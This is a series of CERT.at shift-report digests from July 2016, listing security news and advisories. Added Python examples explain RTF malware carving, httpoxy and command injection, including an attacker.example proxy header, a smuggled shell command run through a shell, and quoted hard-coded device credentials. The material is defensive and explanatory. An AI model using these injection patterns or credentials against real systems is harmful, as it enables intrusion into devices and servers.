---------------------------------------------
https://blog.sucuri.net/2016/07/fake-freedns-used-to-redirect-traffic-to-ma…
*** SwiftKey shows other users' suggestions ***
---------------------------------------------
Users of the alternative smartphone keyboard SwiftKey have received word suggestions belonging to other users. Besides words in other languages, these reportedly included other people's e-mail addresses.
---------------------------------------------
http://heise.de/-3282177
*** DSA-3636 collectd - security update ***
---------------------------------------------
Emilien Gaspar discovered that collectd, a statistics collection and monitoring daemon, incorrectly processed incoming network packets. This resulted in a heap overflow, allowing a remote attacker to either cause a DoS via application crash, or potentially execute arbitrary code.
---------------------------------------------
https://www.debian.org/security/2016/dsa-3636
*** HTML injection flaw allowed certificate theft at Comodo ***
---------------------------------------------
A flaw in the certificate ordering system of the certification authority Comodo allowed attackers to obtain SSL certificates for websites they do not own, enabling man-in-the-middle eavesdropping on those sites' traffic.
---------------------------------------------
http://heise.de/-3282183
*** Xen Vulnerability Allows Hackers To Escape Qubes OS VM And Own the Host ***
---------------------------------------------
Slashdot reader Noryungi writes: Qubes OS certainly has an intriguing approach to security, but a newly discovered Xen vulnerability allows a hacker to escape a VM and own the host. If you are running Qubes, make sure you update ..
---------------------------------------------
https://tech.slashdot.org/story/16/07/30/1552244/xen-vulnerability-allows-h…
*** DSA-3634 redis - security update ***
---------------------------------------------
It was discovered that redis, a persistent key-value database, did not properly protect redis-cli history files: they were created by default with world-readable permissions.
---------------------------------------------
https://www.debian.org/security/2016/dsa-3634
*** Are you getting I-CANNED? ***
---------------------------------------------
One year ago, I already covered the impact that ICANN's latest money grab was having on security, see https://isc.sans.edu/forums/diary/httpsyourfakebanksupport+TLD+confusion+st…. ICANN is the organization that ..
---------------------------------------------
https://isc.sans.edu/diary.html?storyid=21323
*** Booking Calendar <= 6.2 - SQL Injection ***
---------------------------------------------
https://wpvulndb.com/vulnerabilities/8576
*** Booking Calendar <= 6.2 - Reflected Cross-Site Scripting (XSS) ***
---------------------------------------------
https://wpvulndb.com/vulnerabilities/8575
*** Pokémon GO Creator's Twitter Account Hacked — Pika, Pikaaaa! ***
---------------------------------------------
The Twitter account of another high-profile CEO has been hacked! This time, it's Niantic CEO John Hanke, the developer behind the world's most popular game, Pokémon GO. And it ..
---------------------------------------------
https://thehackernews.com/2016/07/pokemon-go-hack.html
*** Kaspersky DDoS Intelligence Report for Q2 2016 ***
---------------------------------------------
In Q2 2016, the geography of DDoS attacks narrowed to 70 countries, with China accounting for 77.4% of attacks. In fact, 97.3% of the targeted resources were located in ..
---------------------------------------------
http://securelist.com/analysis/quarterly-malware-reports/75513/kaspersky-dd…
*** INTERPOL Arrests Business Email Compromise Scam Mastermind ***
---------------------------------------------
Business Email Compromise (BEC) attacks have proven to be an effective tactic, with criminals stealing large amounts of money from various businesses. From 2013 to 2015, BEC-related damages were estimated at US$ 2.3 billion. Targeting ..
---------------------------------------------
http://blog.trendmicro.com/trendlabs-security-intelligence/interpol-arrests…
*** Security flaw: millions of air travellers' records exposed on the Internet for years ***
---------------------------------------------
Invoices, names and in some cases even bank details of air travellers were openly accessible on the Internet for years without any technical hurdle, and nobody noticed. As far as is currently known, criminals overlooked the data as well.
---------------------------------------------
http://www.golem.de/news/sicherheitsluecke-millionen-daten-von-flugreisende…
=======================
= End-of-Shift report =
=======================
Timeframe: Donnerstag 28-07-2016 18:00 − Freitag 29-07-2016 18:00
Handler: Stephan Richter
Co-Handler: n/a
*** Long-running malvertising campaign infected thousands of computers per day ***
---------------------------------------------
Security researchers have shut down a large-scale malvertising operation that used sophisticated techniques to remain undetected for months and served exploits to millions of computers. The operation, dubbed AdGholas, has been running since at least October 2015. According to security vendor Proofpoint, the gang behind it managed to distribute malicious advertisements through more than 100 ad exchanges, attracting between 1 million and 5 million page hits per day. The Proofpoint researchers...
---------------------------------------------
http://www.cio.com/article/3101817/long-running-malvertising-campaign-infec…
*** Would You Use This ATM? ***
---------------------------------------------
One basic tenet of computer security is this: If you can't vouch for a networked thing's physical security, you also cannot vouch for its cybersecurity. That's because in most cases, networked things really aren't designed to foil a skilled and determined attacker who can freely connect his own devices. So you can imagine my shock and horror seeing a Cisco switch and wireless antenna sitting exposed atop of an ATM out in front of a bustling grocery store in my hometown of Northern Virginia.
---------------------------------------------
http://krebsonsecurity.com/2016/07/would-you-use-this-atm/
*** Q2 DDoS activity up 83%, report ***
---------------------------------------------
Nexusguard researchers noticed an 83 percent uptick in DDoS attacks in Q2 2016 compared to Q1.
---------------------------------------------
http://www.scmagazine.com/q2-ddos-threat-report-notes-83-percent-uptick/art…
*** Pwnie Express open sources IoT and Bluetooth security tools ***
---------------------------------------------
Pwnie Express announced the availability of open sourced versions of its Blue Hydra and Android build system software. The release of these tools enable comprehensive Bluetooth detection and community based development of penetration testing Android devices. Bluetooth detection is critical for effective device threat detection and must cover both Low energy (LE) and Classic Bluetooth standards. Blue Hydra has also been integrated into Pwnie's monitoring platform, Pulse, to provide...
---------------------------------------------
https://www.helpnetsecurity.com/2016/07/29/pwnie-express-iot-bluetooth-secu…
*** Businesses need to protect data, not just devices ***
---------------------------------------------
As organizations embrace the digital transformation of their business, they are increasingly facing new security concerns. More companies are moving away from device-centric, platform-specific endpoint security technologies toward an approach that secures their applications and data everywhere. A new Citrix Qualtrics survey revealed that: More than half of Citrix customers reported that they are changing the way their SecOps teams are operated because of the increase in ransomware, targeted...
---------------------------------------------
https://www.helpnetsecurity.com/2016/07/29/protect-data-not-just-devices/
*** Virtually all business cloud apps lack enterprise grade security ***
---------------------------------------------
Blue Coat Systems analyzed apps for their ability to provide compliance, data protection, security controls and more. Of the 15,000 apps analyzed, it was revealed that 99 percent do not provide sufficient security, compliance controls and features to effectively protect enterprise data in the cloud. Shadow data still a major threat: their report revealed that shadow data, unmanaged content employees store and share across cloud apps, continues to remain a major threat, with 23 percent...
---------------------------------------------
https://www.helpnetsecurity.com/2016/07/29/business-cloud-apps-lack-enterpr…
*** Electronics retailer Pollin confirms serious hacker attack ***
---------------------------------------------
After customer data had already been abused for personalised phishing attacks, the electronics shop has now stated that its servers were attacked. The perpetrators took a great deal, apparently including customers' bank account details.
---------------------------------------------
http://heise.de/-3281324
*** Malicious RTF Files, (Fri, Jul 29th) ***
---------------------------------------------
About a year ago I received RTF samples that I could not analyze with RTFScan or rtfobj (FYI: Philippe Lagadec has improved rtfobj.py significantly since then). So I started to write my own RTF analysis tool (rtfdump), but I was not satisfied enough with the way I presented the analysis result to warrant a release of my tool. Last week, I started analyzing new samples and updating my tool. I released it, and show how I analyze sample 07884483f95ae891845caf0d50ce507f in this diary entry. This...
---------------------------------------------
https://isc.sans.edu/diary.html?storyid=21315&rss
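The first step of the analysis the diary describes is carving the embedded object out of the RTF container. As an added example (this is not Didier Stevens' rtfdump and not code from the diary), the following Python locates every `\objdata` destination, decodes its hex payload and checks for the OLE compound-file magic. The RTF sample is constructed here and is not the diary's sample; the handling of control words interleaved with the hex is modelled on how rtfobj-style tools tolerate obfuscation, which is an assumption about the general technique rather than about any particular sample.

```python
import binascii
import re
from typing import Dict, List

# OLE compound-file header: what a malicious \objdata payload usually starts with
OLE_MAGIC = bytes.fromhex("d0cf11e0a1b11ae1")

# Constructed sample (not a real malware file): one embedded object whose
# OLE1 header (version, format id, class-name length, "Package\0") is followed
# by an OLE compound-file magic. Whitespace and a stray control word are
# sprinkled in the way obfuscated samples do it.
SAMPLE_RTF = (
    r"{\rtf1\ansi{\object\objemb{\*\objclass Package}"
    r"{\*\objdata 01050000 02000000 08000000 5061636b61676500"
    r"\lang1033 d0cf11e0a1b11ae1 00000000 00000000}}}"
)

# RTF control word: backslash, letters, optional signed numeric parameter, optional delimiter space
CONTROL_WORD = re.compile(r"\\[a-zA-Z]+-?\d* ?")


def find_objdata(rtf: str) -> List[str]:
    """Return the raw text of every \\objdata destination, up to the brace that
    closes its group. Nested groups are tracked so a '}' inside one of them
    does not end the scan early."""
    found = []
    for m in re.finditer(r"\\objdata\b", rtf):
        depth, i = 0, m.end()
        while i < len(rtf):
            ch = rtf[i]
            if ch == "{":
                depth += 1
            elif ch == "}":
                if depth == 0:
                    break
                depth -= 1
            i += 1
        found.append(rtf[m.end():i])
    return found


def hex_to_bytes(text: str) -> bytes:
    """Decode the hex of an \\objdata destination. Control words, whitespace and
    any other non-hex characters are dropped first, because a real RTF reader
    ignores them too and malware authors rely on that to defeat naive parsers."""
    cleaned = CONTROL_WORD.sub("", text)
    cleaned = re.sub(r"[^0-9a-fA-F]", "", cleaned)
    if len(cleaned) % 2:          # odd trailing nibble: malformed, discard it
        cleaned = cleaned[:-1]
    return binascii.unhexlify(cleaned)


def analyze(rtf: str) -> List[Dict[str, int]]:
    """One record per embedded object: decoded size and the offset of the OLE
    magic (-1 if absent), which tells the analyst where to carve."""
    report = []
    for idx, raw in enumerate(find_objdata(rtf)):
        blob = hex_to_bytes(raw)
        report.append({"index": idx, "size": len(blob), "ole_offset": blob.find(OLE_MAGIC)})
    return report


if __name__ == "__main__":
    for rec in analyze(SAMPLE_RTF):
        print(rec)
```

On the constructed sample the scanner reports one object of 36 bytes with the OLE header at offset 20, i.e. right after the 20-byte OLE1 header; carving from that offset yields the compound file that the next stage (oledump or similar) would take apart.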
*** Under Windows 10 Pro, not all Group Policies will apply any more ***
---------------------------------------------
With Windows 10, and the "Anniversary Update" in particular, Microsoft is changing how Group Policies are applied. In future, not only the operating system version (Windows 7/8/10) but also the edition (Pro, Enterprise) decides which policies take effect. [...] After the update it will no longer be possible to centrally control this behaviour on Pro editions of Windows 10. As a side effect, workarounds such as setting the corresponding registry keys are closed off as well.
---------------------------------------------
http://www.heise.de/newsticker/meldung/Unter-Windows-10-Pro-gelten-bald-nic…
*** Citrix NetScaler Service Delivery Appliance Multiple Security Updates ***
---------------------------------------------
A number of vulnerabilities have been identified in the Citrix NetScaler Service Delivery Appliance (SDX) that could allow a malicious administrative user to crash the host or other VMs and execute arbitrary code on the SDX host.
---------------------------------------------
https://support.citrix.com/article/CTX206006
*** iPrint Appliance 1.1 Patch 6 ***
---------------------------------------------
Abstract: This patch includes bug fixes, security fixes and a consolidation of previously released patches
Document ID: 5250978
Security Alert: Yes
Distribution Type: Public
Entitlement Required: No
Files: iPrint-1.1.0.417.HP.zip (27.49 MB), iPrint-1.1.0.421.HP.zip (1,008.67 MB)
Products: iPrint Appliance 1.1
Superseded Patches: iPrint Appliance 1.1 Patch
---------------------------------------------
https://download.novell.com/Download?buildid=vv7Z6imI7Js~
*** iPrint Appliance 2.0 Patch 2 ***
---------------------------------------------
Abstract: This patch includes bug fixes, security fixes and a consolidation of previously released patches
Document ID: 5250983
Security Alert: Yes
Distribution Type: Public
Entitlement Required: No
Files: iPrint-2.0.0.531.HP.zip (721.05 MB)
Products: iPrint Appliance 2
Superseded Patches: iPrint Appliance 2.0
---------------------------------------------
https://download.novell.com/Download?buildid=svMlzlyK0go~
*** Bugtraq: [SYSS-2016-046] Perixx PERIDUO-710W - Missing Protection against Replay Attacks ***
---------------------------------------------
http://www.securityfocus.com/archive/1/539041
*** VU#217871: Intel CrossWalk project does not validate SSL certificates after first acceptance ***
---------------------------------------------
Vulnerability Note VU#217871: Intel CrossWalk project does not validate SSL certificates after first acceptance. Original release date: 29 Jul 2016 | Last revised: 29 Jul 2016
Overview: The Intel Crosswalk project is a framework for developing hybrid apps for Android and iOS. Crosswalk does not properly handle SSL certificate validation when a user accepts an invalid certificate: after that first acceptance, the app no longer validates any future SSL certificate.
Description: CWE-356: Product UI does not
---------------------------------------------
http://www.kb.cert.org/vuls/id/217871
*** Bugtraq: Vicon Network Cameras - Authentication Bypass ***
---------------------------------------------
http://www.securityfocus.com/archive/1/539037
*** Bugtraq: [SYSS-2016-044] Logitech K520 - Insufficient Protection against Replay Attacks ***
---------------------------------------------
http://www.securityfocus.com/archive/1/539040
*** Bugtraq: [SYSS-2016-059] Microsoft Wireless Desktop 2000 - Insufficient Verification of Data Authenticity (CWE-345) ***
---------------------------------------------
http://www.securityfocus.com/archive/1/539045
*** Bugtraq: [SYSS-2016-047] Perixx PERIDUO-710W - Keystroke Injection Vulnerability ***
---------------------------------------------
http://www.securityfocus.com/archive/1/539042
=======================
= End-of-Shift report =
=======================
Timeframe: Mittwoch 27-07-2016 18:00 − Donnerstag 28-07-2016 18:00
Handler: Stephan Richter
Co-Handler: n/a
*** Taking Steps to Fight Back Against Ransomware ***
---------------------------------------------
Ransomware is an attack in which malware encrypts files and extorts money from victims. It has become a favorite among cybercriminals because it is easy to develop, simple to execute, and does a very good job of compelling users to pay to regain access to their precious files or systems. Almost anyone and every business...
---------------------------------------------
https://blogs.mcafee.com/mcafee-labs/taking-steps-to-fight-back-against-ran…
*** Infection Monkey: Test a network from an attacker's point of view ***
---------------------------------------------
Infection Monkey, a tool designed to test the resiliency of modern data centers against cyber attacks, was developed as an open source tool by GuardiCore's research group. "Traditional testing tools are no longer able to effectively detect vulnerabilities in today's data center networks as they cannot continuously exploit the weakest link and propagate in-depth, resulting in a very partial view of network vulnerabilities" said Pavel Gurvich, CEO of GuardiCore. How...
---------------------------------------------
https://www.helpnetsecurity.com/2016/07/28/infection-monkey-test-network-at…
*** Verifying SSL/TLS certificates manually, (Thu, Jul 28th) ***
---------------------------------------------
I think that we can surely say that, with all its deficiencies, SSL/TLS is still a protocol we cannot live without, and the basis of today's secure communication on the Internet. Quite often I get asked how certificates are really verified by browsers or other client utilities. Sure, the canned answer that certificates get signed by CAs and a browser verifies if signatures are correct is always there, but more persistent questions on how it exactly works happen here and there as well. So, if you...
---------------------------------------------
https://isc.sans.edu/diary.html?storyid=21311&rss
*** Password manager: LastPass fixes critical flaw ***
---------------------------------------------
According to the company, the critical vulnerability in the LastPass password manager reported yesterday by Tavis Ormandy has now been closed. A new LastPass version is said to be available for Firefox.
---------------------------------------------
http://www.golem.de/news/passwort-manager-lastpass-bestaetigt-behebung-krit…
*** Phishing attack on Pollin customers ***
---------------------------------------------
Several customers of the electronics retailer Pollin have contacted heise Security, fearing that their personal data, including bank account details, were copied from the retailer.
---------------------------------------------
http://heise.de/-3280449
*** You cant turn off Cortana in the Windows 10 Anniversary Update ***
---------------------------------------------
Microsoft made an interesting decision with Windows 10's Anniversary Update, which is now in its final stages of development before it rolls out on August 2. Cortana, the personal digital assistant that replaced Windows 10's search function and taps into Bing's servers to answer your queries with contextual awareness, no longer has an off switch.
---------------------------------------------
http://www.pcworld.com/article/3100358/windows/you-cant-turn-off-cortana-in…
*** Security Holes Exposed In Smart Lighting System ***
---------------------------------------------
Sylvania Osram Lightify vulnerabilities could allow an attacker to turn out the lights or ultimately infiltrate the corporate network.
---------------------------------------------
http://www.darkreading.com/cloud/security-holes-exposed-in-smart-lighting-s…
*** Background: Windows 10 with protection against pass-the-hash attacks ***
---------------------------------------------
Using modern virtualisation technology, Credential Guard is intended to defuse one of the most dangerous attack techniques against Windows networks.
---------------------------------------------
http://heise.de/-3280610
*** DSA-3633 xen - security update ***
---------------------------------------------
Multiple vulnerabilities have been discovered in the Xen hypervisor. The Common Vulnerabilities and Exposures project identifies the following problems:
---------------------------------------------
https://www.debian.org/security/2016/dsa-3633
*** DSA-3632 mariadb-10.0 - security update ***
---------------------------------------------
Several issues have been discovered in the MariaDB database server. The vulnerabilities are addressed by upgrading MariaDB to the new upstream version 10.0.26. Please see the MariaDB 10.0 Release Notes for further details:
---------------------------------------------
https://www.debian.org/security/2016/dsa-3632
*** Vuln: DBD::mysql my_login() Function Use After Free Remote Code Execution Vulnerability ***
---------------------------------------------
http://www.securityfocus.com/bid/92118
*** Vuln: QEMU hw/scsi/esp.c Remote Code Execution Vulnerability ***
---------------------------------------------
http://www.securityfocus.com/bid/92119
*** F5 Security Advisory: glibc vulnerability CVE-2016-4429 ***
---------------------------------------------
https://support.f5.com:443/kb/en-us/solutions/public/k/17/sol17075474.html?…
*** AXIS Authenticated Remote Command Execution ***
---------------------------------------------
https://cxsecurity.com/issue/WLB-2016070209
*** DFN-CERT-2016-1153: Apache Software Foundation HTTP Server, Lighttpd: a "vulnerability" allows HTTP proxy redirection ***
---------------------------------------------
https://portal.cert.dfn.de/adv/DFN-CERT-2016-1153/
*** DFN-CERT-2016-1216: Red Hat JBoss Operations Network: multiple vulnerabilities allow, among other things, execution of arbitrary code ***
---------------------------------------------
https://portal.cert.dfn.de/adv/DFN-CERT-2016-1216/
*** Xen Security Advisory CVE-2016-5403 / XSA-184 ***
---------------------------------------------
A guest can submit virtio requests without bothering to wait for completion and is therefore not bound by virtqueue size. (This requires reusing vring descriptors in more than one request, which is incorrect but possible.) Processing a request allocates a VirtQueueElement and therefore causes unbounded memory allocation controlled by the guest.
---------------------------------------------
http://xenbits.xen.org/xsa/advisory-184.html
*** Sentinel 7.3 SP3 (Sentinel 7.3.3.0) ***
---------------------------------------------
Abstract: Sentinel 7.3.3 upgrade for Sentinel 7.3
Document ID: 5250650
Security Alert: Yes
Distribution Type: Public
Entitlement Required: No
Files: sentinel_server-7.3.3.0-2205.x86_64.tar.gz.sha256 (109 bytes), sentinel_server-7.3.3.0-2205.x86_64.tar.gz (1.69 GB)
Products: Sentinel 7.3.2, Sentinel 7.1.1, Sentinel 7.1, Sentinel 7.3.1, Sentinel 7.2, Sentinel 7.2.1, Sentinel 7.3, Sentinel 7.2.2, Sentinel 7.0, Sentinel 7.0.1, Sentinel 7.0.2, Sentinel 7.0.3, Sentinel 7.3.3
Superseded Patches: None
---------------------------------------------
https://download.novell.com/Download?buildid=aGwCXcABsl0~
*** Cisco Security Advisories ***
---------------------------------------------
*** Cisco Nexus 1000v Application Virtual Switch Cisco Discovery Protocol Packet Processing Denial of Service Vulnerability ***
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
---------------------------------------------
*** Cisco Wireless LAN Controller Denial of Service Vulnerability ***
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
---------------------------------------------
*** Cisco Videoscape Session Resource Manager Denial of Service Vulnerability ***
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
---------------------------------------------
*** Cisco Prime Service Catalog Reflected Cross-Site Scripting Vulnerability ***
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
---------------------------------------------
*** Cisco FireSIGHT System Software Snort Rule Bypass Vulnerability ***
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
---------------------------------------------
*** Cisco Email Security Appliance File Type Filtering Vulnerability ***
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
---------------------------------------------
=======================
= End-of-Shift report =
=======================
Timeframe: Dienstag 26-07-2016 18:00 − Mittwoch 27-07-2016 18:00
Handler: Stephan Richter
Co-Handler: n/a
*** Dridex Re-Mastered ***
---------------------------------------------
Well, it's been quite an eventful time since last I posted. I have so much in the works that it is hard to tell where to begin. It seems that we are seeing new flavors of ransomware every week and botnets seem to come and go with a frequency we've not seen in a while. This week, though, I promised Dridex, so Dridex it is.
---------------------------------------------
http://www.scmagazine.com/dridex-re-mastered/article/511683/
*** Analyze of a Linux botnet client source code, (Wed, Jul 27th) ***
---------------------------------------------
I like to play active-defense. Every day, I extract attackers' IP addresses from my SSH honeypots and perform a quick Nmap scan against them. The goal is to gain more knowledge about the compromised hosts. Most of the time, hosts are located behind a residential broadband connection. But sometimes, you find more interesting stuff. When valid credentials are found, the classic scenario is the installation of a botnet client that will be controlled via IRC to launch multiple attacks or scans.
---------------------------------------------
https://isc.sans.edu/diary.html?storyid=21305&rss
*** Ransomware: malware developer spies on the competition, and victims benefit ***
---------------------------------------------
Thousands of keys for decrypting data held hostage by the Chimera encryption trojan have surfaced on Pastebin.
---------------------------------------------
http://heise.de/-3279201
*** Critical flaw in LastPass: developers working on a fix ***
---------------------------------------------
Tavis Ormandy has found a critical security vulnerability in the LastPass password manager and reported it via Twitter. According to him, the software's developers are already working on a fix.
---------------------------------------------
http://heise.de/-3279424
*** Black Hat 2016: new attack exposes plaintext URLs despite HTTPS ***
---------------------------------------------
Especially on public networks, encrypted HTTPS connections protect against administrators, or even other users on the same network, eavesdropping on one's traffic. This protection is apparently leaky, and on almost all browsers and operating systems.
---------------------------------------------
http://www.golem.de/news/black-hat-2016-neuer-angriff-schafft-zugriff-auf-k…
*** Free and Commercial Tools to Implement the Center for Internet Security (CIS) Security Controls, Part 16: Account Monitoring and Control ***
---------------------------------------------
This is Part 16 of a How-To effort to compile a list of tools (free and commercial) that can help IT administrators comply with what was formerly known as the "SANS Top 20 Security Controls". It is now known as the Center for Internet Security (CIS) Security Controls. A summary of the previous posts is here: Part 1 - we looked at Inventory of Authorized and Unauthorized Devices. Part 2 - we looked at Inventory of Authorized and Unauthorized Software. Part 3 - we looked at Secure...
---------------------------------------------
https://www.alienvault.com/blogs/security-essentials/free-and-commercial-to…
*** From Locky with love - reading malicious attachments ***
---------------------------------------------
Read on to learn about the latest downloaders used to deliver Locky ransomware and see how to statically decipher their hidden URLs.
---------------------------------------------
https://blog.malwarebytes.com/threat-analysis/2016/07/from-locky-with-love-…
*** httpoxy in Austria ***
---------------------------------------------
Last week we published a warning about httpoxy, which concerns the following: CGI is a standard for generating web pages dynamically with server-side scripts. Information about the client and the request is passed to the script in environment variables. If the HTTP request contains a "Proxy:" header, the content of that header ends up in the environment variable HTTP_PROXY...
---------------------------------------------
http://www.cert.at/services/blog/20160727173056-1764.html
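The header-to-environment mapping that makes httpoxy possible is mechanical, so it is easy to show end to end. The following Python is an added example, not code from the CERT.at warning or from any affected server: it applies the RFC 3875 rule for protocol-specific meta-variables to a constructed request carrying a "Proxy" header, shows that the result is exactly the HTTP_PROXY variable that outbound HTTP client libraries honour, and puts the gateway-side mitigation (drop the "Proxy" header before mapping) beside it. The request headers and the attacker host are constructed.

```python
from typing import Dict, Optional

# Constructed request headers: an httpoxy probe. "Proxy" is not a standard
# request header; an attacker sends it hoping the CGI layer turns it into
# HTTP_PROXY and the script's HTTP client then routes its requests to him.
ATTACK_HEADERS = {
    "Host": "shop.example",
    "User-Agent": "curl/7.47.0",
    "Proxy": "http://attacker.example:8080",
}


def cgi_meta_variables(headers: Dict[str, str]) -> Dict[str, str]:
    """RFC 3875 section 4.1.18: every request header becomes HTTP_<NAME>, with
    the name upper-cased and '-' replaced by '_'. Nothing here knows that
    HTTP_PROXY is special to client libraries; that collision is the bug."""
    env = {}
    for name, value in headers.items():
        env["HTTP_" + name.upper().replace("-", "_")] = value
    return env


def cgi_meta_variables_hardened(headers: Dict[str, str]) -> Dict[str, str]:
    """Mitigation at the CGI gateway: drop the 'Proxy' header before mapping.
    No legitimate client sends it, so stripping it breaks nothing."""
    safe = {k: v for k, v in headers.items() if k.lower() != "proxy"}
    return cgi_meta_variables(safe)


def effective_proxy(env: Dict[str, str]) -> Optional[str]:
    """What many HTTP client libraries do when run inside the CGI script:
    honour HTTP_PROXY/http_proxy from the environment for outbound requests.
    Returns the proxy URL the script's own requests would be sent through."""
    return env.get("HTTP_PROXY") or env.get("http_proxy")


def is_httpoxy_probe(headers: Dict[str, str]) -> bool:
    """Detection rule for a WAF or access-log filter: any request carrying a
    'Proxy' header is a probe or an attack, never normal traffic."""
    return any(k.lower() == "proxy" for k in headers)


if __name__ == "__main__":
    print("vulnerable gateway, outbound proxy:", effective_proxy(cgi_meta_variables(ATTACK_HEADERS)))
    print("hardened gateway, outbound proxy:  ", effective_proxy(cgi_meta_variables_hardened(ATTACK_HEADERS)))
    print("probe detected:", is_httpoxy_probe(ATTACK_HEADERS))
```

The published server-side fixes work at the same layer as `cgi_meta_variables_hardened`: with Apache httpd and mod_headers, `RequestHeader unset Proxy early`; with nginx in front of FastCGI, `fastcgi_param HTTP_PROXY "";`. Fixing the client libraries is the complementary measure, and is what the language runtimes did (for example, ignoring HTTP_PROXY when REQUEST_METHOD is set, i.e. when running as CGI).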
*** Iris ID IrisAccess iCAM4000/iCAM7000 Hardcoded Credentials Remote Shell Access ***
---------------------------------------------
The Iris ID IrisAccess iCAM4000/7000 series suffer from use of hard-coded credentials. When visiting the device interface with a browser on port 80, the application loads an applet JAR file, ICAMClient.jar, into the user's browser, which serves additional admin features. In the JAR file there is an account "rou" with password "iris4000" that has read and limited write privileges on the affected node. An attacker can access the device using these credentials by starting a simple telnet session on port 23
---------------------------------------------
http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5347.php
*** Iris ID IrisAccess ICU 7000-2 Remote Root Command Execution ***
---------------------------------------------
The Iris ID IrisAccess ICU 7000-2 device suffers from an unauthenticated remote command execution vulnerability. The vulnerability exists because several POST parameters in the /html/SetSmarcardSettings.php script are not sanitized when passed to the exec() PHP function while updating the Smart Card Settings on the affected device. Calling the $CommandForExe variable, which is set to invoke the /cgi-bin/setsmartcard CGI binary with the affected parameters as arguments, allows the attacker to execute
---------------------------------------------
http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5346.php
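The flaw above is the textbook command-injection shape: request parameters concatenated into one command string that a shell parses. As an added example, not the vendor's PHP and not the advisory's exploit, here is that pattern and its fix in Python: `build_command_vulnerable` mirrors the exec()-style concatenation, `run_vulnerable` shows a shell actually executing the injected part, and `build_command_hardened` validates each parameter against a strict allow-list and returns an argv list for a shell-free subprocess call. The parameter names and the /cgi-bin/setsmartcard path come from the advisory; the POST bodies and the argument grammar (channel id as a short integer, version as dotted digits) are constructed assumptions, since the advisory does not document the binary's arguments.

```python
import os
import re
import subprocess
from typing import Dict, List

# Binary named in the advisory; the argument grammar below is an assumption.
SETSMARTCARD = "/cgi-bin/setsmartcard"

# Constructed POST bodies: a legitimate update and one carrying an injected command.
GOOD_POST = {"HidChannelID": "1", "HidVerForPHP": "1.0"}
EVIL_POST = {"HidChannelID": "1; echo INJECTED", "HidVerForPHP": "1.0"}


def build_command_vulnerable(post: Dict[str, str]) -> str:
    """The flawed pattern: parameters interpolated into a single command string
    that is handed to /bin/sh (PHP exec() does this; in Python, subprocess with
    shell=True is the equivalent). Shell metacharacters in a value are live."""
    return "{} {} {}".format(
        SETSMARTCARD, post.get("HidChannelID", ""), post.get("HidVerForPHP", "")
    )


# Allow-list per parameter. [0-9] rather than \d so Unicode digits do not slip
# through; fullmatch so nothing may precede or follow the accepted shape.
ALLOWED = {
    "HidChannelID": re.compile(r"[0-9]{1,3}"),
    "HidVerForPHP": re.compile(r"[0-9]+(\.[0-9]+){0,2}"),
}


def build_command_hardened(post: Dict[str, str]) -> List[str]:
    """Validate each parameter against its allow-list and return an argv list.
    Run it with subprocess.run(argv) (shell=False): no shell ever parses the
    values, so ';', '|' and '$(...)' are just bytes inside one argument."""
    argv = [SETSMARTCARD]
    for name, pattern in ALLOWED.items():
        value = post.get(name, "")
        if pattern.fullmatch(value) is None:
            raise ValueError("rejected {}={!r}".format(name, value))
        argv.append(value)
    return argv


def is_accepted(post: Dict[str, str]) -> bool:
    """True if the hardened builder would accept this request body."""
    try:
        build_command_hardened(post)
    except ValueError:
        return False
    return True


def run_vulnerable(post: Dict[str, str]) -> str:
    """Execute the vulnerable command string through the shell and return its
    stdout. /cgi-bin/setsmartcard does not exist here, so the shell reports
    that on stderr and then runs whatever followed the ';'. Returns '' on
    platforms without a POSIX shell."""
    if os.name != "posix":
        return ""
    proc = subprocess.run(
        build_command_vulnerable(post), shell=True,
        stdout=subprocess.PIPE, stderr=subprocess.DEVNULL, universal_newlines=True,
    )
    return proc.stdout


if __name__ == "__main__":
    print("vulnerable string:", repr(build_command_vulnerable(EVIL_POST)))
    print("shell output:     ", repr(run_vulnerable(EVIL_POST)))
    print("hardened argv:    ", build_command_hardened(GOOD_POST))
    print("evil accepted:    ", is_accepted(EVIL_POST))
```

Escaping (shlex.quote or PHP's escapeshellarg) is a weaker second line of defence: it stops the shell from splitting the value, but still lets arbitrary bytes reach the binary's argument parser. Validating against the expected shape and dropping the shell entirely removes both problems.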
*** Iris ID IrisAccess ICU 7000-2 Multiple XSS and CSRF Vulnerabilities ***
---------------------------------------------
The application is prone to multiple reflected cross-site scripting vulnerabilities due to a failure to properly sanitize user-supplied input to the HidChannelID and HidVerForPHP POST parameters in the SetSmarcardSettings.php script. Attackers can exploit this issue to execute arbitrary HTML and script code in a user's browser session. The application also allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be
---------------------------------------------
http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5345.php
*** F5 Security Advisory: MySQL vulnerability CVE-2016-2047 ***
---------------------------------------------
https://support.f5.com:443/kb/en-us/solutions/public/k/53/sol53729441.html?…
*** Bugtraq: [security bulletin] HPSBST03603 rev.1 - HPE StoreVirtual Products running LeftHand OS using glibc, Remote Arbitrary Code Execution, Denial of Service (DoS) ***
---------------------------------------------
http://www.securityfocus.com/archive/1/539015
*** Siemens SIMATIC WinCC, PCS 7, and WinCC Runtime Professional Vulnerabilities ***
---------------------------------------------
This advisory contains mitigation details for two vulnerabilities in the Siemens SIMATIC WinCC, PCS 7, and WinCC Runtime Professional.
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSA-16-208-01
*** Siemens SIMATIC NET PC-Software Denial-of-Service Vulnerability ***
---------------------------------------------
This advisory contains mitigation details for a denial-of-service vulnerability in the Siemens SIMATIC NET PC-Software.
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSA-16-208-02
*** Siemens SINEMA Remote Connect Server Cross-site Scripting Vulnerability ***
---------------------------------------------
This advisory contains mitigation details for a cross-site scripting vulnerability in the Siemens SINEMA Remote Connect Server application.
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSA-16-208-03
*** Rockwell Automation FactoryTalk EnergyMetrix Vulnerabilities ***
---------------------------------------------
